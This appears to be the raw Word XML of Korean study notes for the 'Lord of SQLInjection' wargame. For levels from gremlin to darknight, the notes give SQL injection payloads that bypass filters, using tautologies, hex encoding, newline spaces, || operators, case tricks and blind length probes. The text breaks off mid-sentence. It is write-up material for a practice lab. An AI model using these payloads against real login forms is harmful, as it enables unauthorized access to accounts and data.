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2EC" w:rsidRDefault="00FA1B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>los 문제풀이</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA1B2F" w:rsidRDefault="00FA1B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>REMLIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA1B2F" w:rsidRDefault="00FA1B2F">
      <w:r>
        <w:t>?id=admin&amp;&amp;pw=123’ or 1=1 –‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00181E56" w:rsidRDefault="00181E56"/>
    <w:p w:rsidR="009B7DAF" w:rsidRDefault="009B7DAF">
      <w:r>
        <w:t>COBOLT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B7DAF" w:rsidRDefault="009B7DAF">
      <w:r>
        <w:t>?id=admin’ or 1=1 –‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00181E56" w:rsidRDefault="00181E56"/>
    <w:p w:rsidR="009B7DAF" w:rsidRDefault="009B7DAF">
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00646CCA">
        <w:t>OBLIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00646CCA" w:rsidRDefault="00646CCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서 guest의 </w:t>
      </w:r>
      <w:r w:rsidR="000E1F27">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>no값은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(때려맞춤)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E285C" w:rsidRDefault="000E285C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">즉 DB에서 no=1 인 레코드의 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">값이 </w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인 값을 알 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00181E56" w:rsidRDefault="00181E56">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그래서 id조건을 깰려먼 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값을 다른거로 적어야함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00181E56" w:rsidRPr="00181E56" w:rsidRDefault="00181E56">
      <w:r>
        <w:t>1 or id=0x61646D69</w:t>
      </w:r>
      <w:r w:rsidRPr="00181E56">
        <w:t>6E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">문자열을 </w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진수로 변환</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E285C" w:rsidRDefault="000E285C"/>
    <w:p w:rsidR="00181E56" w:rsidRDefault="00181E56">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ORC </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00181E56" w:rsidRDefault="00181E56">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php - addslashes함수</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00181E56" w:rsidRDefault="00181E56">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ex) i</w:t>
      </w:r>
      <w:r>
        <w:t>’m a boy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 쿼리문으로 전송하게 되면 중간에 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>때문에 오류 발생</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00181E56" w:rsidRDefault="00181E56">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이런 쿼리 문자에 </w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 특수문자 전에 삽입해서 특수문자를 문자열 내에 사용할 수 있도록,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>escape시켜줌</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00181E56" w:rsidRDefault="00D570FE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>여기서 패스워드를 하나하나 알아내야 겟다고 생각</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D570FE" w:rsidRDefault="00D570FE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>먼저 패스워드 길이 유추</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D570FE" w:rsidRDefault="00D570FE">
      <w:r>
        <w:t>?pw=123’ or 1=1 and length(pw)=8 – ‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220988" w:rsidRDefault="00220988"/>
    <w:p w:rsidR="00220988" w:rsidRDefault="00220988">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>패스워드 앞자리 유추</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220988" w:rsidRDefault="00220988">
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pw=213</w:t>
      </w:r>
      <w:r>
        <w:t>’ or 1=1 and substring(pw,1)=’2’ –‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220988" w:rsidRDefault="00220988">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자동화 스크립트 작성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D570FE" w:rsidRPr="00D570FE" w:rsidRDefault="00D570FE"/>
    <w:p w:rsidR="00181E56" w:rsidRDefault="00452084">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WOLFMAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452084" w:rsidRPr="00181E56" w:rsidRDefault="00452084"/>
    <w:p w:rsidR="000E285C" w:rsidRDefault="00452084">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL 질의문에서 id는 guest값으로 고정되어있고 패스워드 값만 받고 잇음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452084" w:rsidRDefault="00452084">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그리고 공백이 필터링 되어있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452084" w:rsidRDefault="00452084">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서 공백 우회는 공백문자중 하나인 </w:t>
      </w:r>
      <w:r>
        <w:t>%0A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 우회 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452084" w:rsidRPr="00452084" w:rsidRDefault="00A52AE9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pw=2</w:t>
      </w:r>
      <w:r>
        <w:t>’%0Aor%0Aid=’admin’--%0A’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00646CCA" w:rsidRDefault="00646CCA"/>
    <w:p w:rsidR="00225586" w:rsidRDefault="00225586"/>
    <w:p w:rsidR="00225586" w:rsidRDefault="006E3D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Darkelf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D2D" w:rsidRDefault="006E3D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서는 영문자로 </w:t>
      </w:r>
      <w:r>
        <w:t>or, and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 필터링 되어있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D2D" w:rsidRDefault="006E3D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>||로 or 우회 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D2D" w:rsidRDefault="006E3D2D"/>
    <w:p w:rsidR="006E3D2D" w:rsidRDefault="006E3D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>orge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D2D" w:rsidRDefault="006E3D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>여기서도 Darkelf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>처럼 or, and를 필터링 하고 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D2D" w:rsidRDefault="006E3D2D">
      <w:r>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 우회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D2D" w:rsidRDefault="006E3D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>근데 싱글쿼터,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">더블 쿼터를 사용 못하게 하는 </w:t>
      </w:r>
      <w:r>
        <w:t>addslashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드 내에 존재</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D2D" w:rsidRDefault="006E3D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">쿼터로 인한 오류가 발생하지 않도록 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">addslashes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수를 사용하여 오류를 막음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D2D" w:rsidRDefault="006E3D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>여기서는 Blind SQL Injection을 사용하여 패스워드를 알아내야됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D2D" w:rsidRDefault="006E3D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그래서 알아낸 패스워드 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E3D2D">
        <w:t>6c864dec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3B2F" w:rsidRDefault="000D3B2F"/>
    <w:p w:rsidR="000D3B2F" w:rsidRDefault="000D3B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>troll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E1F27" w:rsidRPr="006E3D2D" w:rsidRDefault="000E1F27">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>싱글쿼터도 필터링 되어있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00646CCA" w:rsidRDefault="000D3B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서는 문자열 필터링 함수 ereg를 사용하며 쿼리문에 그대로 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이라는 문자열이 들어올 경우 막는 역할을 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D3B2F" w:rsidRDefault="00667182">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">자세히 설명하면 </w:t>
      </w:r>
      <w:r>
        <w:t>ereg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 HTTP 메소드를 통해 들어오는 사용자의 입력 검증 또는 필터링을 위해 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ereg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 같은 함수를 사용함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667182" w:rsidRDefault="00667182">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">근데 SQL 구문으로 넘어가면서 </w:t>
      </w:r>
      <w:r>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에서 데이터는 기본값으로는 대소문자를 구분하지 않는다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667182" w:rsidRDefault="00667182">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그래서 id=</w:t>
      </w:r>
      <w:r>
        <w:t>’admin’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 하면 필터링에서 걸리기 때문에 </w:t>
      </w:r>
      <w:r>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 과 같이 대문자로 바꿔서</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667182" w:rsidRDefault="00667182">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿼리문으로 날리면 admin=admIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>즉 같은 값으로 인식하여 로그인이 가능하게된다</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667182" w:rsidRDefault="00667182"/>
    <w:p w:rsidR="00667182" w:rsidRDefault="00667182">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vampire</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2044" w:rsidRDefault="001C2044"/>
    <w:p w:rsidR="001C2044" w:rsidRDefault="001C2044">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>싱글쿼터를 필터링함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2044" w:rsidRDefault="001C2044">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str_replace 함수로 문자열 중에 admin이 들어올 경우 공백으로 바꾸는 부분을 볼 수가 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2044" w:rsidRDefault="001C2044">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그래서 id=adadminmin 으로 넣어주면 중간에 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 공백으로 치환되고 </w:t>
      </w:r>
      <w:r>
        <w:t>ad + min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 붙어 넘어가 admin 이라는 값을 넘겨줄 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2044" w:rsidRDefault="001C2044"/>
    <w:p w:rsidR="001C2044" w:rsidRDefault="001C2044">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>skeleton</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2044" w:rsidRDefault="001C2044"/>
    <w:p w:rsidR="001C2044" w:rsidRDefault="001C2044">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>언더바(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">_), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>점(.), 역슬래쉬(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">\), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 필터링</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93C9D" w:rsidRDefault="001C2044">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id 값은 기본적으로 guest로 바뀌어있음,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그리고 뒤에 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and 1=0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 들어가 있어 모두 거짓 값으로 바뀌게 만들어 놓았음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93C9D" w:rsidRDefault="00F93C9D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pw=123</w:t>
      </w:r>
      <w:r>
        <w:t>’ or id=’admin’ – ‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93C9D" w:rsidRDefault="00F93C9D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">쿼리문을 다음과 같이 날려주면 주석문 뒤에 있는 값은 모두 의미가 없어지게 되어 </w:t>
      </w:r>
      <w:r>
        <w:t>and 1=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 기능을 하지 않게 되고 중간에 </w:t>
      </w:r>
      <w:r>
        <w:t>id=’admin’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 값을 넣어주면서 admin이라는 조건이 참이 되게 만들었음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E02B5" w:rsidRDefault="007E02B5"/>
    <w:p w:rsidR="007E02B5" w:rsidRDefault="007E02B5"/>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2"/>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2"/>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2"/>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2"/>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2"/>
    <w:p w:rsidR="007E02B5" w:rsidRDefault="007E02B5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>golem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E02B5" w:rsidRDefault="007E02B5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>언더바(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">_), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>점(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>역슬래쉬(\), 필터링</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E02B5" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>addslashes함수를 통해 문법에 맞지 않는 싱글쿼터,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">더블쿼터 등을 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">escape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>시킴</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>or/and/substr 함수 필터링 -&gt; right, left 함수를 통해 우회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2"/>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>우선 비밀번호의 길이를 알아내야됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pw=123</w:t>
      </w:r>
      <w:r>
        <w:t>’||length(pw)&gt;2 – ‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRPr="00E87CF2" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:t xml:space="preserve">=&gt; Hello guest </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E02B5" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">위 패스워드 길이 조건은 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계정도 해당이 될 것임,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그러나 </w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 먼저 나온 이유는 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>guest 계정이 admin 계정보다 레코드 순서가 먼저이기 때문에 먼저 출력됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2"/>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pw=123</w:t>
      </w:r>
      <w:r>
        <w:t>’||length(pw)&lt;9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:t>=&gt;Hello admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>다음에 9로 넘어가면서 admin을 가져오는 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">admin 계정의 비밀번호 길이는 </w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자동화 코드 제작</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87CF2" w:rsidRPr="00E87CF2" w:rsidRDefault="00E87CF2"/>
    <w:p w:rsidR="00F93C9D" w:rsidRDefault="00F93C9D"/>
    <w:p w:rsidR="00E87CF2" w:rsidRDefault="00E87CF2"/>
    <w:p w:rsidR="00F93C9D" w:rsidRDefault="00B72B1A">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A"/>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A"/>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A"/>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A"/>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A"/>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Darknight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A"/>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>싱글쿼터,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>substr,ascii,= 필터링,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A">
      <w:r>
        <w:t xml:space="preserve">addslashes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 통해 싱글쿼터를 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">일반 문자열로 인식하도록 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">escape </w:t>
      </w:r>
